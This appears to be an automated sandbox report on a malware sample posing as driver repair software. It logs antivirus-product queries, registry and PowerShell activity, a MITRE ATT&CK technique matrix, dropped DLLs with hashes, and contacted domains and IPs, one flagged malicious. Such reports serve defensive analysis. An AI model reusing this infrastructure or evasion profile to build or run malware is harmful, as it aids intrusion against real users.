Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation		1
Windows Service		1
Windows Service		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network Medium11
Non-Standard Port		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
PowerShell		11
Registry Run Keys / Startup Folder		11
Process Injection		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)11
DLL Side-Loading		11
Registry Run Keys / Startup Folder		11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)11
DLL Side-Loading		11
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer12
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem32
System Information Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\ProgramData\ypkiExpertDriverToolkit\ACLOGGER.dll0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\ACLOGGER.dll0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\DMAppsRes.dll0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\DMAppsRes.dll0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\ETWCoreUIComponentsResources.dll0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\ETWCoreUIComponentsResources.dll0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\KBDARME.DLL0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\KBDARME.DLL0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\KBDARMW.DLL0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\KBDARMW.DLL0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\KBDFA.DLL0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\KBDFA.DLL0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\KBDIR.DLL0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\KBDIR.DLL0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\KBDIT.DLL0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\KBDIT.DLL0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\KBDKYR.DLL0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\KBDKYR.DLL0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\KBDLT.DLL0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\KBDLT.DLL0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\KBDUR.DLL0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\KBDUR.DLL0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\KBDURDU.DLL0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\KBDURDU.DLL0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\MapControlStringsRes.dll0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\MapControlStringsRes.dll0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\Microsoft-WindowsPhone-SEManagementProvider.dll0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\Microsoft-WindowsPhone-SEManagementProvider.dll0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\Microsoft.Bcl.AsyncInterfaces.dll0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\Microsoft.Bcl.AsyncInterfaces.dll0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\MouseA.dll0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\MouseA.dll0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\MouseA.sys2%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\MouseA.sys0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\PhoneServiceRes.dll0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\PhoneServiceRes.dll0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\PhoneutilRes.dll0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\PhoneutilRes.dll0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\RDCameraDriver.dll0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\RDCameraDriver.dll0%VirustotalBrowse
C:\ProgramData\ypkiExpertDriverToolkit\RapidFireServer.dll0%ReversingLabs
C:\ProgramData\ypkiExpertDriverToolkit\RapidFireServer.dll0%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
catsanddogs.mypets.ws
18.230.148.111
truetrue
    		unknown
    lkathcatkbhgbhtdt.mysecuritycamera.com
    		18.228.39.40
    		truefalse
      		unknown
      ckfadbtmggbhtdt.dyn-o-saur.com
      		10.10.10.13
      		truefalse
        		unknown
        cgtfbbgkchtgbhtdt.mysecuritycamera.com
        		18.228.7.23
        		truefalse
          		unknown
          getblaktgmhgbhtdt.mysecuritycamera.com
          		52.67.27.221
          		truefalse
            		unknown
            ip-api.com
            		208.95.112.1
            		truefalse
              		high
              tkkaglkgldtgbhtdt.mysecuritycamera.com
              		54.94.96.255
              		truefalse
                		unknown
                gaadktggtbdgbhtdt.mysecuritycamera.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://ip-api.com/jsonfalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    18.228.39.40
                    		lkathcatkbhgbhtdt.mysecuritycamera.comUnited States
                    		16509AMAZON-02USfalse
                    208.95.112.1
                    		ip-api.comUnited States
                    		53334TUT-ASUSfalse
                    1.1.1.1
                    		unknownAustralia
                    		13335CLOUDFLARENETUSfalse
                    18.228.7.23
                    		cgtfbbgkchtgbhtdt.mysecuritycamera.comUnited States
                    		16509AMAZON-02USfalse
                    52.67.27.221
                    		getblaktgmhgbhtdt.mysecuritycamera.comUnited States
                    		16509AMAZON-02USfalse
                    18.230.148.111
                    		catsanddogs.mypets.wsUnited States
                    		16509AMAZON-02UStrue

                    Private

                    IP
                    10.10.10.13

                    General Information

                    Joe Sandbox Version:38.0.0 Beryl
                    Analysis ID:1314451
                    Start date and time:2023-09-26 13:24:16 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                    Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                    Number of analysed new started processes analysed:24
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • EGA enabled
                    Analysis Mode:stream
                    Analysis stop reason:Timeout
                    Sample file name:file.zip
                    Detection:MAL
                    Classification:mal72.troj.evad.winZIP@19/98@20/24
                    Cookbook Comments:
                    • Found application associated with file extension: .zip

                    Warnings

                    • Exclude process from analysis (whitelisted): rundll32.exe, SIHClient.exe, SgrmBroker.exe, usocoreworker.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • Timeout during stream target processing, analysis might miss dynamic analysis data

                    Created / dropped Files

                    C:\ProgramData\ypkiExpertDriverToolkit\ACLOGGER.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):63336
                    Entropy (8bit):6.706475737496657
                    Encrypted:false
                    SSDEEP:
                    MD5:E4883C0F8A426DC0DDE360A827852D2C
                    SHA1:247C77F735EE3E9C02F98ABAFC7C049DA6F8FD25
                    SHA-256:0DC48DD095765F793CEDFE85C61BCE7032A8CA9DD0D4E602E618A0CA56008A9C
                    SHA-512:297CA233B6C9CE002CB1F8BA0485466AC4B933468D8E1BAAF2F937A20DC36C316DDB7F35505FF7FB2DFE4FDEAF81F9229556026D809DEBF383B8D8CC6A824872
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z......................................................x...d......d......d...........d......Rich...........................PE..L...gW.b...........!.........F......................................................;.....@.............................l...|...........................h/..............p...........................p...@...............\............................text...g........................... ..`.rdata..V........0..................@..@.data...@...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\DMAppsRes.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.8756724655506996
                    Encrypted:false
                    SSDEEP:
                    MD5:024A7BE08FBDABAFFE575460A35D1187
                    SHA1:04F66D04F52DEAFF79907A99FC7C7CF36172DAF0
                    SHA-256:9ECBD3E77A9A319B0FE073BD90C938A9DB565E3B3C88A9654ADF0C2D69C0102F
                    SHA-512:F7A66C7DDDC4DB4E49C3381E0E77AFB30FCBFBE3E5B35350A5ED80A21B3C3F6E350F5B908C08C2E0C47D607B80C018F537C5BA7A2162A781B2607DD26C2A090D
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d...y............." .........................................................0......"3....`A......................................................... ..................................T............................................................................rdata..............................@..@.rsrc........ ......................@..@....y...........T...T...T.......y...........$...............y...............................T....rdata..T...|....rdata$zzzdbg.... .......rsrc$01..... ..H....rsrc$02.... ...x~k....W..M..w.....%np.n...y...............................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\ETWCoreUIComponentsResources.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):3.038434984993505
                    Encrypted:false
                    SSDEEP:
                    MD5:EE9CAD75CCEA298BC6972977BB0F7D87
                    SHA1:E932FCE3E3D7433CE07AAEFACE178555B5CEF46F
                    SHA-256:E3D78B6B2DFF753C979C9B54A1461A4D4542D83410C6A15DC97B3F84C3014FDC
                    SHA-512:0AA1E401429EA31B50AC39D621B81E76F1E91F322F9F5C9FF302F15B1D8C7BBC27465CAFC50F5D6F20EAEF4B41AC101C50D0FCCF9AB5A5AB228BC3DDB36FC003
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L......S...........!..............................g..........................0............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......S........T...8...8..........S........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....|.j2."#.Se.c.5PU:.Zi...<.vs...S........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\KBDARME.DLL

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7168
                    Entropy (8bit):3.126190356593496
                    Encrypted:false
                    SSDEEP:
                    MD5:7F5AD86B9F7CCC7F7CE9D4E5170A94E6
                    SHA1:206712263F51F6A9E5A4AE4FAC163CC329E781B7
                    SHA-256:415CE966256939094BB504556D27DA6578C31B7E95CC2C8FF2FE7EDEA3A2A28B
                    SHA-512:3A40A5B496543B1D0172D6E92AB9F39554BF8EECD48DE0CF24B4A36CF42E1C0DE8B9ACF416273E112F509D0CC39E39143FC2451DD9EAFB5D1A89FEB5A6D1585C
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............bm..bm..bm...e..bm...m..bm...i..bm......bm...o..bm.Rich.bm.........................PE..d................" .........................................................P......z.....`A........................................@,..T............0.......................@.......,..T............................................................................text............................... ..`.data........ ......................@..@.rsrc........0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\KBDARMW.DLL

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7168
                    Entropy (8bit):3.126256342984017
                    Encrypted:false
                    SSDEEP:
                    MD5:8E2B0617E2841AA8A82363F05CFCDA57
                    SHA1:BD936118D6664B46443E5EDE8B8FC2194324E116
                    SHA-256:C6E09B9472E72EDEDD8982E1D6C5E220BFF051D88939E7B2A5EA07183E6A8CAF
                    SHA-512:540A90D529D340D554C0C1D7E9FE38D3F8052516E5A40F8A45DF40884F50A9FE6C67429A17020F439E42CB5772A06BF374909DB2956F35DA188AD69EE6A8D22D
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
